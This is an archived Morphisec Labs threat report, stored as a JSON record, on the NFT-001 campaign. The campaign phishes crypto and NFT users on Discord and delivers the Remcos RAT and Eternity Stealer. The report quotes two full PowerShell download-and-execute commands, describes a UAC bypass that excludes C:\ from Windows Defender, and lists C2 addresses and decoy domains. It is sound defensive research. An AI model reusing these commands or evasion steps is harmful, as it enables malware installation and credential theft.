{
	"id": "c682899e-ca2f-4ea7-bd60-7af6c8ad5b91",
	"created_at": "2026-04-06T01:29:21.053609Z",
	"updated_at": "2026-04-10T03:20:18.985459Z",
	"deleted_at": null,
	"sha1_hash": "cbab175f5dfdc50f90757570188505dbda67ad3c",
	"title": "Watch Out for the New NFT-001",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 727556,
	"plain_text": "Watch Out for the New NFT-001\r\nBy Morphisec Labs\r\nArchived: 2026-04-06 00:31:17 UTC\r\nA non-fungible token (NFT) is a record on a blockchain associated with a digital or physical asset, usually a digital file such as a photo, video, or audio. An NFT’s ownership is recorded in the blockchain, and it can be sold and traded. NFTs differ from cryptocurrencies, which are mostly fungible, in that NFTs are unique and non-substitutable. The NFT market is booming, with trading volume exploding by over 20,000 percent from 2020 to 2021. Cybercriminals have rushed to exploit this trend. The Threat Labs team now has fresh research on the crypto and NFT malware NFT-001, which first surfaced in November 2020.\r\nThe NFT-001 attack sequence typically includes the following steps:\r\n1) Attackers target users in crypto and NFT communities on Discord and other forums.\r\n2) The victim receives a private phishing message related to an NFT or financial opportunity. The message includes a link to a fake website and a malicious app that promises an improved user experience.\r\n3) The downloaded malware unpacks a remote access trojan (RAT) that is used to steal browsing data, install a keylogger, and perform other surveillance functions.\r\n4) The attacker then uses the data for identity theft and to steal the victim’s wallet and other possessions.\r\nThe threat actor has now switched from the Babadeda crypter to a new staged downloader while using the same delivery infrastructure as before. The new downloader adds increased defense evasion abilities to this malware.\r\nNew NFT-001 Technical Details\r\nMorphisec Labs has tracked several waves of the NFT malware delivering the Remcos RAT since it first surfaced. In June 2022 we found a shift in the crypter used to deliver the Remcos RAT. The Babadeda crypter has now been discarded for a new staged downloader. 
\r\nhttps://blog.morphisec.com/nft-malware-new-evasion-abilities\r\nPage 1 of 7\r\nDate | Packer/Crypter/Downloader | Payload | C2 | Port\r\n11/2020 – 07/2021 | Custom .NET packer | Remcos | 95.217.114[.]96, 37.48.89[.]8, 94.23.218[.]87 | 4782, 4783\r\n07/2021 – 08/2021 | Crypto Obfuscator (.NET) | Remcos | 135.181.17[.]47 | 4783\r\n08/2021 – 10/2021 | BABADEDA | BitRAT | 135.181.140[.]182, 135.181.140[.]153, 135.181.6[.]215 | 7777\r\n11/2021 – 12/2021 | BABADEDA using DLL sideloading with IIS Express | Remcos, AsyncRAT | 65.21.127[.]164 | 4783, 4449\r\n12/2021 – 02/2022 | BABADEDA using DLL sideloading with Adobe / TopoEdit | Remcos | 193.56.29[.]242 | 4783\r\n01/2022 – 03/2022 | BABADEDA using DLL sideloading with Link.exe | Remcos | 157.90.1[.]54 | 4783\r\nApril 2022 | BABADEDA using DLL sideloading with Adobe | Remcos | 145.239.253[.]176 | 4782\r\n07/2022 – *Active | BABADEDA using DLL sideloading with Mp3tag.exe | Remcos | 65.108.9[.]124 | 4783\r\n06/2022 – *Active | Downloader | Remcos | 144.91.79[.]86 | 4444, 4783\r\nThe malware delivery hasn’t changed much. It sends a user a private message enticing them to download a related application supposedly granting the user access to the newest features. Below is an example of the phishing message targeting users of “Dune”, an Ethereum-based crypto data analytics platform.\r\nIf a user clicks the hyperlink in the message, it directs them to a decoy website that mimics the original. There, the user is prompted to download the malicious “installer”, which infects the victim’s machine with the Remcos RAT.\r\nThe New Staged Downloader\r\nThe threat actor keeps the first stage “installers” at a low detection rate. 
\r\nThe execution starts by performing a User Account Control (UAC) bypass. It hijacks the default handler for the ms-settings protocol and sets it to execute a PowerShell command that adds the C:\\ folder to the Windows Defender exclusion list. The code that performs this UAC bypass technique is well documented in the open-source repository. But the attacker employed it extremely poorly: he didn’t even bother to remove unnecessary WinAPI calls, such as printing to the console.\r\nAfter excluding the C:\\ folder from Windows Defender, the following PowerShell commands are de-obfuscated and executed:\r\n1) The first PowerShell command downloads and executes a plain Remcos RAT (C2 – 144.91.79[.]86).\r\npowershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $ProgressPreference = ‘SilentlyContinue’; Invoke-WebRequest http://rwwmefkauiaa[.]ru/bs8bo90akv.exe -OutFile \\”$env:appdata/Microsoft/dllservice.exe\\”; Start-Process -Filepath \\”$env:appdata/Microsoft/dllservice.exe\\”\r\nThe C2 used in that Remcos RAT was also seen in the wild in samples using the Babadeda crypter. This bolsters our suspicion that it’s the same threat actor.  
2) The second PowerShell command downloads and executes Eternity Stealer, which steals sensitive information from a victim’s machine such as:\r\nBrowser information like login credentials, history, and cookies\r\nVPN and FTP client data\r\nMessaging software data\r\nPassword management software data\r\npowershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $ProgressPreference = ‘SilentlyContinue’; mkdir \\”$env:appdata/Microsoft/AddIns\\”; Invoke-WebRequest http://rwwmefkauiaa[.]ru/u84ls.exe -OutFile \\”$env:appdata/Microsoft/AddIns/exclusions.exe\\”; Start-Process -Filepath \\”$env:appdata/Microsoft/AddIns/exclusions.exe\\”\r\nWe also noticed that a variant of this downloader seen in the Tandem Espionage campaign shares commonalities with this campaign:\r\nThere is a similar UAC bypass technique using fodhelper.exe (a less evasive implementation)\r\nIt downloads and executes two malicious executables (Arkei stealer and Eternity stealer)\r\nThe Eternity stealer is downloaded by exactly the same PowerShell command as the second PowerShell command above, from the same URL\r\nThough the URL downloading the Eternity stealer is the same, we think these may be two different threat actors that used the same downloader as a service.\r\nDefending Against NFT Malware Like NFT-001\r\nThe crypto and NFT communities are on the cutting edge of financial innovation, and they are a lucrative target for attackers. This new staged downloader for NFT-001 is more evasive than the earlier version, increasing its ability to sneak past traditional cybersecurity solutions. According to the latest Picus report, defense evasion is now the most popular tactic among malware operators.\r\nThis tactic is popular because there aren’t many effective tools against defense evasion. 
One such tool is Morphisec’s revolutionary Automated Moving Target Defense (AMTD) technology, which comprehensively prevents defense evasion techniques. Unlike other cybersecurity solutions, which focus on detecting known patterns with response playbooks, MTD preemptively blocks attacks on memory and applications and removes the need for a response. To learn more about Morphisec’s revolutionary Moving Target Defense technology, read the white paper: Zero Trust + Automated Moving Target Defense: The Ultimate Ransomware Strategy.\r\nIOCs\r\nSamples\r\n849B58523E4EB0006DA82410AD2792352A97BE92C528FC252B45F84C1F04986B\r\n97AA3C220BC95C83032A2A4597FD463EBA11508347D5D836CEEA4E82588E00D4\r\nB97FE69C3D771AF4A62B9FBDD5CCE61F9E18D3911C9B3E28C5BF94831F791EF5\r\n76D1E65F336FA106514B0B618B32D003E8D5340917FB0517A8AF90FC6AFD9BCA\r\nB011F2FAB7414CB794348BA0591042789BA8FE47E002D7FDC165D135A2783172\r\n7F58D9CE7358A10E0679E36FF7BCF4E51A3DBFA16CE9D8FFD53A2B216773BB54\r\n80116F648EA5FB431E50A8AA935C168C29D3FFD1E5AA128BD18CE1C167FC8F9E\r\n2C0116126420998B955F7D01666BD0F6AF9DC83FC4E33D7D7B3DD086ECE905C7\r\nC2EFBCC341A979FD404E51A55AB0436E746BDA35DF2A08F074605FC6AB929797\r\n568D62692AC0E7667CB925719D2535F548488C96D9B0747CB97DC05FF640A2B3\r\nA6C9FECEB19F666C483051E77D2DD3D71CD256664B427F96CF778AEE62AB83F7\r\n030203206B667BB49B24A6E209FF3D27F611A4451687705F7B1E853A0921A788\r\n8CEDA430ADF0FD37DD732D0903B45ED4141F0786D2A271B58754A6C9D6B68690\r\n46B1A4907BB6B0C021AA223421A2059825A331EEE4CB6BD08E413100337B1609\r\n4110C49337323EA9D83C22D41A072E28C5B0540325B48A3291C1447488E8D704\r\n87D57E20A3502F6C4264FC3DA9C671352C30700B0363A331E9FC1E11E8F2CA89\r\nDecoy Websites\r\ncoinstats[.]top\r\napp.perp[.]run\r\nhawksight[.]space\r\nmmfinance[.]fund\r\nilluvium[.]run\r\nabracadabra[.]run\r\nwallet.polygon-bridge[.]com\r\nyieldsguild[.]com\r\nopptimism[.]com\r\napp.opptimism[.]com 
\r\napp.optimism[.]run\r\ndune-analytics[.]com\r\nclipper[.]run\r\nAbout the author\r\nMorphisec Labs\r\nMorphisec Labs continuously researches threats to improve defenses and share insight with the broader cyber community. The team engages in ongoing cooperation with leading researchers across the cybersecurity spectrum and is dedicated to fostering collaboration, data sharing and offering investigative assistance.\r\nSource: https://blog.morphisec.com/nft-malware-new-evasion-abilities",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.morphisec.com/nft-malware-new-evasion-abilities"
	],
	"report_names": [
		"nft-malware-new-evasion-abilities"
	],
	"threat_actors": [],
	"ts_created_at": 1775438961,
	"ts_updated_at": 1775791218,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cbab175f5dfdc50f90757570188505dbda67ad3c.pdf",
		"text": "https://archive.orkl.eu/cbab175f5dfdc50f90757570188505dbda67ad3c.txt",
		"img": "https://archive.orkl.eu/cbab175f5dfdc50f90757570188505dbda67ad3c.jpg"
	}
}